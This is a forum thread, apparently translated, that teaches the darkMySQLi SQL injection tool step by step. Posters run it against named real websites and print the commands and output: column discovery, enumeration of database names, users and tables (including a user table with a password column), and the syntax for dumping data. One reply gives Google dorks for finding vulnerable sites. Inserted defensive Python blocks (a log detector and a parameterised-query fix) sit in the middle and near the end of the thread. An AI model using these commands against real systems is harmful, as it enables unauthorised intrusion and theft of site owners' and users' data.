darkMySQLI tutorial step by step
#11
Bro, it looks like the usage is almost the same as using schemafuzz, right?.....

#12
(09-14-2011, 09:05 PM) junior.riau18 Wrote: this is similar to schemafuzz, hehehe
I've just tried this kind of thing on Windows; haven't tried it on BT5 yet, heh.
(08-31-2011, 09:40 PM) wine trochanter Wrote:
(08-31-2011, 08:43 PM) zee eichel Wrote: this tool might already be old news, but since it's in BackTrack 5, I figure I have to post it here... hmm... so for those of you who already know this tool, please stay quiet and let the others who don't know it yet learn.

OK, straight to it.

In BackTrack 5 R1 this tool lives in the directory
Code:
/pentest/web/darkmysqli

OK, let's assume we're already inside it...

Code:
root@zee-eichel{/pentest/web/darkmysqli}:ls
./  ../  darkMySQLi.log  DarkMySQLi.py  
root@zee-eichel{/pentest/web/darkmysqli}:

I happened to find a vulnerable site, which I'll use as the example here

Code:
http://www.asf.ca/news.php?id=720'

I've already emailed the admin so it gets patched; this is just for a sample...

OK, now let's look at the tool's help option

root@zee-eichel{/pentest/web/darkmysqli}:python DarkMySQLi.py --help

darkMySQLi v1.6 [email protected]
forum.darkc0de.com
Usage: ./darkMySQLi.py [options]
Options:
-h, --help shows this help message and exits
-d, --debug display URL debug information

Target:
-u URL, --url=URL Target url

Methodology:
-b, --blind Use blind methodology (req: --string)
-s, --string String to match in page when the query is valid
Method:
--method=PUT Select to use PUT method ** NOT WORKING
Modes:
--dbs Enumerate databases MySQL v5+
--schema Enumerate Information_schema (req: -D,
opt: -T) MySQL v5+
--full Enumerate all we can MySQL v5+
--info MySQL Server configuration MySQL v4+
--fuzz Fuzz Tables & Columns Names MySQL v4+
--findcol Find Column length MySQL v4+
--dump Dump database table entries (req: -T,
opt: -D, -C, --start) MySQL v4+
--crack=HASH Crack MySQL Hashs (req: --wordlist)
--wordlist=LIS.TXT Wordlist to be used for cracking
Define:
-D DB database to enumerate
-T TBL database table to enumerate
-C COL database table column to enumerate
Optional:
--ssl To use SSL
--end To use + and -- for the URLS --end "--" (Default)
To use /**/ and /* for the URLS --end "/*"
--rowdisp Do not display row # when dumping
--start=ROW Row number to begin dumping at
--where=COL,VALUE Use a where clause in your dump
--orderby=COL Use a orderby clause in your dump
--cookie=FILE.TXT Use a Mozilla cookie file
--proxy=PROXY Use a HTTP proxy to connect to the target url
--output=FILE.TXT Output results of tool to this file


For the first stage we have to find the columns of the target site's database

Syntax:
Code:
python DarkMySQLi.py -u situstarget.com/bugs.php?id=[sql error] --findcol

root@zee-eichel{/pentest/web/darkmysqli}:python DarkMySQLi.py -u http://www.asf.ca/news.php?id=720 --findcol

|--------------------------------------------------|
| [email protected] v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|

[+] URL: http://www.asf.ca/news.php?id=720
[+] 18:07:13
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 1,2,
[+] Column Length is: 2
[+] Found null column at column #: 2,

[!] SQLi URL: http://www.asf.ca/news.php?id=720+AND+1=...SELECT+1,2--
[!] darkMySQLi URL: http://www.asf.ca/news.php?id=720+AND+1=...1,darkc0de--

[-] 18:07:20
[-] Total URL Requests: 2
[-] Done

Don't forget to check darkMySQLi.log

If the site is vulnerable, the next step, as in the closing message of the tool ("Don't forget to check darkMySQLI.log"), is to check that log, which is in the same directory as the tool

root@zee-eichel{/pentest/web/darkmysqli}:cat darkMySQLi.log
|--------------------------------------------------|
| [email protected] v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|

[+] URL: http://www.asf.ca/news.php?id=720
[+] 18:45:16
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
[+] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 1,2,
[+] Column Length is: 2
[+] Found null column at column #: 2,

[!] SQLi URL: http://www.asf.ca/news.php?id=720+AND+1=...SELECT+1,2--
[!] darkMySQLi URL: http://www.asf.ca/news.php?id=720+AND+1=...1,darkc0de--

[-] [18:45:24]
[-] Total URL Requests: 2
[-] Done


Now, pay attention to the part I colored red; for the third step, enter the syntax

Our real goal is to display all the columns in the victim site's database

Code:
python DarkMySQLi.py -u [url from the darkMySQLi log]-- --full


root@zee-eichel{/pentest/web/darkmysqli}:python DarkMySQLi.py -u http://www.asf.ca/news.php?id=720+AND+1=...1,darkc0de-- --full

|--------------------------------------------------|
| [email protected] v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|

[+] URL: http://www.asf.ca/news.php?id=720+AND+1=...1,darkc0de
[+] 18:54:36
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: asfc4477_asfdb
User: asfc4477_asfuser@localhost
Version: 5.1.56-log
[+] Starting full SQLi information_schema enumeration...
[+] Number of Rows: 790
[-] Unexpected error: <class 'urllib2.HTTPError'>
[-] Trying again!
[proxy]: None
[agent]: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[debug]: http://www.asf.ca/news.php?id=720+AND+1=...+LIMIT+0,1--



[-] 18:54:41
[-] Total URL Requests: 3
[-] Done

Don't forget to check darkMySQLi.log

The next step is to look at the log again


|--------------------------------------------------|
| [email protected] v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|

[+] URL: http://www.asf.ca/news.php?id=720+AND+1=...1,darkc0de
[+] 18:54:36
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: asfc4477_asfdb
User: asfc4477_asfuser@localhost
Version: 5.1.56-log
[+] Number of Rows: 790



[-] [18:54:41]
[-] Total URL Requests: 3
[-] Done


Again, look at what I colored red
We've already got the database name, user and version... still version 5, wow wow... there are still people running version 5, tsk tsk tsk

The next step is just to dump the database, hahaha
You can do it manually; the info is already there...

Syntax:
Code:
darkMySQLi.py -u "(target with the bug)" --dump -D (database name) -T (table name) -C (column,column)

That's all for now, hope it's useful...

Sir, I've gotten to this point; how do I dump it? I'm still confused, sir

[+] URL: http://mti.ugm.ac.id/~budi/show.php?id=1...e,darkc0de
[+] 20:35:51
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: budi
User: budi@localhost
Version: 5.1.41-3ubuntu12.10
[+] Starting full SQLi information_schema enumeration...
[+] Number of Rows: 29

[Database]: budi
[Table: Columns]

[1]blog: nama,url
[2]buku_tamu: tanggal,nama,email,komentar
[3]downl: ID,Diskripsi,AttactM,TglKirim
[4]inform: ID,Tanggal,Judul,Kategori,Diskripsi,Image,Author
[5]kategori: kode,deskripsi
[6]link: id,url,diskripsi
[7]mahasiswa: nim,nama,prody
[8]prody: kode,nama
[9]quote: kd,isi

[-] 20:36:09
[-] Total URL Requests: 32
[-] Done

Don't forget to check darkMySQLi.log

root@bt:/pentest/web/darkmysqli#

but it throws an error instead, sir

Take it slow, bro... oh yeah,
I've tried this from Windows, heh
these are the tables that exist ==>>
Database: budi
[8 tables]
+-----------+
| buku_tamu |
| downl |
| inform |
| kategori |
| link |
| mahasiswa |
| prody |
| quote |
+-----------+

I didn't find anything password-related, hehehe

Try inform...
Maybe it's short for informasi (information)
(09-15-2011, 02:54 AM) andhie_13 Wrote: Bro, it looks like the usage is almost the same as using schemafuzz, right?.....

Yep
The white ones are the ones who should act and be talented!
Linuxtivist blog
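Seen from the server side, runs like the ones above leave a recognisable trail in the web access log. The following is an added example (not code from the thread or from darkMySQLi) that flags that trail in constructed Apache combined-log lines: the `AND 1=... UNION SELECT` column probe, the `darkc0de` null-column marker, information_schema enumeration, and the User-Agent rotation visible between the three runs. All IPs, timestamps, sizes and agents in SAMPLE_LOG are made up, and the elided part of the injected URL is spelled out as a plain UNION SELECT.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed Apache combined-log lines (not from the thread). The probing
# requests copy the shape of the tool's URLs above, with the elided SELECT
# spelled out; IPs, sizes and agents are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Sep/2011:18:07:13 +0700] "GET /news.php?id=720 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux)"
10.0.0.9 - - [14/Sep/2011:18:07:15 +0700] "GET /news.php?id=720+AND+1=2+UNION+SELECT+1,2-- HTTP/1.1" 200 4870 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
10.0.0.9 - - [14/Sep/2011:18:07:16 +0700] "GET /news.php?id=720+AND+1=2+UNION+SELECT+1,darkc0de-- HTTP/1.1" 200 4870 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
10.0.0.9 - - [14/Sep/2011:18:07:18 +0700] "GET /news.php?id=720+AND+1=2+UNION+SELECT+1,table_name+FROM+information_schema.tables+LIMIT+0,1-- HTTP/1.1" 200 4901 "-" "Opera/8.00 (Windows NT 5.1; U; en)"
10.0.0.5 - - [14/Sep/2011:18:08:01 +0700] "GET /news.php?id=721 HTTP/1.1" 200 5133 "-" "Mozilla/5.0 (X11; Linux)"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) '
    r'[^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# Fingerprints visible in the thread's output: the "AND 1=... UNION SELECT"
# column probe, the darkc0de null-column marker, and information_schema
# enumeration. All are checked on the URL-decoded request path.
SIGNATURES = {
    "union_probe": re.compile(r"\band\s+1=\d+\s+union\s+select\b", re.I),
    "darkc0de_marker": re.compile(r"\bdarkc0de\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.", re.I),
}

def scan_log(text):
    """Return (findings, ua_by_ip): one finding per matching request, plus
    the set of User-Agents each client IP used (the tool rotates agents)."""
    findings, ua_by_ip = [], defaultdict(set)
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                        # not combined-log format, skip it
        decoded = unquote_plus(m["path"])   # "+" and %xx back to plain text
        ua_by_ip[m["ip"]].add(m["ua"])
        hits = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
        if hits:
            findings.append((m["ip"], m["ts"], hits, decoded))
    return findings, ua_by_ip

def rotating_agents(ua_by_ip, threshold=3):
    """IPs that presented at least `threshold` distinct User-Agents; the three
    runs in the thread show three different agents from one operator."""
    return sorted(ip for ip, uas in ua_by_ip.items() if len(uas) >= threshold)
```

Each of the three probing lines produces a finding for 10.0.0.9, and that IP is also the only one reported by rotating_agents; a real deployment would feed the live access log instead of SAMPLE_LOG.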

#13
I've already dug through it, bro, but there's nothing password-related,
and what I sent ended up being a comment instead, haha

#14
Bro zee, can I have permission to copy-paste this tutorial to my blog? Thanks

#15
Code:
darkMySQLi.py -u "(target with the bug)" --dump -D (database name) -T (table name) -C (column,column)


Bro, I'm still confused about which is the table name and which is column,column, even though I've gotten this far. Keep going, try it!
If you've got it, reply, bro. REMEMBER, DON'T DAMAGE that website. We're only learning. OK

root@bt:/pentest/web/darkmysqli# python DarkMySQLi.py -u http://www.ciptaagro.com/artikel/artikel.php?id=13 --findcol

|--------------------------------------------------|
| [email protected] v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|

[+] URL: http://www.ciptaagro.com/artikel/artikel.php?id=13
[+] 22:05:29
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 1,2,3,4,5,
[+] Column Length is: 5
[+] Found null column at column #: 1,2,3,4,

[!] SQLi URL: http://www.ciptaagro.com/artikel/artikel...+1,2,3,4,5--
[!] darkMySQLi URL: http://www.ciptaagro.com/artikel/artikel...darkc0de,5--

[-] 22:05:50
[-] Total URL Requests: 5
[-] Done

Don't forget to check darkMySQLi.log

root@bt:/pentest/web/darkmysqli# python DarkMySQLi.py -u http://www.ciptaagro.com/artikel/artikel...darkc0de,5-- --full

|--------------------------------------------------|
| [email protected] v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|

[+] URL: http://www.ciptaagro.com/artikel/artikel...darkc0de,5
[+] 22:07:13
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: ciptaagr_cas_database
User: ciptaagr_cas2@localhost
Version: 5.0.92-community
[+] Starting full SQLi information_schema enumeration...
[+] Number of Rows: 58

[Database]: ciptaagr_cas_database
[Table: Columns]

[1]artikel: idartikel,judul,isi,tanggal,status
[2]banner: idbanner,pemilik,tglmasuk,status,keterangan,gambar
[3]berita: idberita,tipe,judul,isi,tanggal,status
[4]inbox: idpesan,tanggal,nama,email,alamat,telp,perusahaan,pesan,baca
[5]jenis: idjenis,nama_jenis,keterangan,idkategori
[6]kategori: idkategori,nama_kategori,keterangan
[7]komen: idkomen,komentar,tanggal,status,idartikel,userid
[8]produk: idproduk,idkategori,idjenis,nama,stok,keterangan,gambar,slide
[9]user: userid,username,nama,password,email,website,perusahaan,telepon,tipe,status
[10]visitor: jumlah

[-] 22:16:23
[-] Total URL Requests: 61
[-] Done

Don't forget to check darkMySQLi.log





#16
Bro, why can't I get it to work...
at the --full part this shows up, bro:

[+] 14:59:22
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Opera/8.00 (Windows NT 5.1; U; en)
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...

[-] There seems to be a problem with your URL. Please check and try again.
[DEBUG]: http://www.xxxxxxxxxxxxx.com/catalog.php...1e,0x20),2--

why, bro?? please help..
i am back | when you feel you're not smart enough, that's when you are smart.

#17
Wow, bro, wow.... I'll try again later, downloading BackTrack 5r1....

#18
How do I find a vulnerable site? Sorry, I'm a new user

#19
(12-11-2011, 06:45 PM) surya Wrote: How do I find a vulnerable site? Sorry, I'm a new user

Google it, bro, with dorks.
dorks:
-inurl:trainers.php?id=

-inurl:buy.php?category=

-inurl:article.php?ID=

-inurl:play_old.php?id=


#20
bro zee, I want to ask, does this only apply to sites that still use native PHP, where the query string still uses a question mark like '?id=1'? What if the site is already anti-SQL-injection, like today's websites that mostly use frameworks? Can we still hit them with SQL injection??? Please enlighten me.
echo (attacked==1) ? defend : counter attack;
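The question above turns on how the `id` value reaches the query, not on whether a framework is involved. As an added example (not code from the thread or from any site mentioned in it), the constructed in-memory SQLite table below stands in for a `news.php?id=` page and shows the string-built query beside a validated, parameterised one; the table contents and the `published` flag are made up for the demonstration.

```python
import re
import sqlite3

# Constructed stand-in for a news.php?id= page: an in-memory SQLite table
# with one public and one unpublished row (not data from the thread).
db = sqlite3.connect(":memory:")
db.executescript("""
CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, published INTEGER);
INSERT INTO news VALUES (720, 'public post', 1), (721, 'draft, not public', 0);
""")

def lookup_unsafe(raw_id):
    """The native-PHP pattern the thread targets: the query-string value is
    pasted into the SQL text, so the caller can rewrite the WHERE clause."""
    sql = ("SELECT id, title FROM news WHERE published = 1 AND id = "
           + raw_id + " ORDER BY id")
    return db.execute(sql).fetchall()

def lookup_safe(raw_id):
    """Same page, hardened: check the input is a plain numeric id and bind
    it as a parameter, so the value is never parsed as SQL. This binding,
    not the framework around it, is what stops the injection."""
    if not re.fullmatch(r"\d{1,9}", raw_id):
        return []                     # reject anything that is not a plain id
    sql = "SELECT id, title FROM news WHERE published = 1 AND id = ? ORDER BY id"
    return db.execute(sql, (int(raw_id),)).fetchall()
```

With the input `720 OR 1=1` the unsafe version also returns the unpublished row, because the appended `OR` rewrites the WHERE clause; the safe version rejects the input and returns nothing.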





